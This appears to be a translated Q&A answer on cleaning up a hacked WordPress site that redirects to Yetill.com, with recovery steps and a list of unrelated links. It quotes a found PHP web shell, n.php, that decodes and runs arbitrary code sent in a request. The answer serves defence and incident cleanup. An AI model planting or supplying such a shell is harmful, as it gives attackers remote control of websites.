wordpress - Wordpress 网站总是重定向到 Yetill.com
解决方案
初步步骤:
- 备份一切
- 检查文件 wp-includes/js/jquery/jquery.js - 第一行应该只包含一个评论,比如
/*! jQuery v1....
在该行之前删除任何内容(你做了备份,对吗?) - 检查您的 /wp-content/uploads 目录是否有可疑文件。对我们来说,我们有恶意文件,例如在这个子目录中:/ultimatemember/temp/[random dir]/n.php - 备份后删除这些文件。
- 安装 WordFence WP 插件并扫描您的网站
- 仔细检查 wp-includes/js/jquery/jquery.js 是否仍然可以(可以再次修改)
- 考虑 WordFence 选项“禁用上传目录的代码执行”以防止未来的入侵,如果它适用于您的站点(测试!)。
背景:
我们有同样的问题。Wordfence 注意到文件 wp-includes/js/jquery/jquery.js 在服务器上被修改。恢复到原始版本似乎可以解决它。但是,文件很快就被感染了(几个小时?)。所以我们还不知道来源......
我们在 /wp-content/uploads/ultimatemember/temp/[random dir]/n.php 中发现了一些可疑代码:
<?php file_put_contents('sdgsdfgsdg','<?php '.base64_decode($_REQUEST['q']));
include('sdgsdfgsdg'); unlink('sdgsdfgsdg'); ?>
这基本上从外部执行任何 PHP 代码......
删除这些文件后,该网站似乎恢复正常(几个小时)。
我们还注意到页面源中有一个可疑的<a>
标签;但不确定它的相关性。
<a class="html-attribute-value html-resource-link" target="_blank"
href="https://our.site/wordpress/wp-includes/js/jquery/jquery.js?ver=1.12.4"
rel="noreferrer noopener">https://our.site/wordpress/wp-includes/js/jquery/jquery.js?ver=1.12.4</a>
推荐阅读
- python - 对于带有 numpy/pandas 的循环(遍历列标题)
- php - 在表单页面上显示表单错误消息
- azure - Xamarin 文本 blob Azure 存储
- c# - C# UWP BluetoothLEDevice.FromIdAsync 停止工作
- azure - Azure:Microsoft.Compute 资源提供商在“注册”中停留了大约一天
- vb.net - 在 uwp 中处理 excel 文件
- javascript - 更新数据表输入字段并在输入更改时自动计算总数
- rust - 从 Rust 向 C 函数提供`char **` 参数?
- c++ - Qt:窗口图标质量不好
- c# - 如何通过我的实体基类上的属性过滤从实体框架返回的所有内容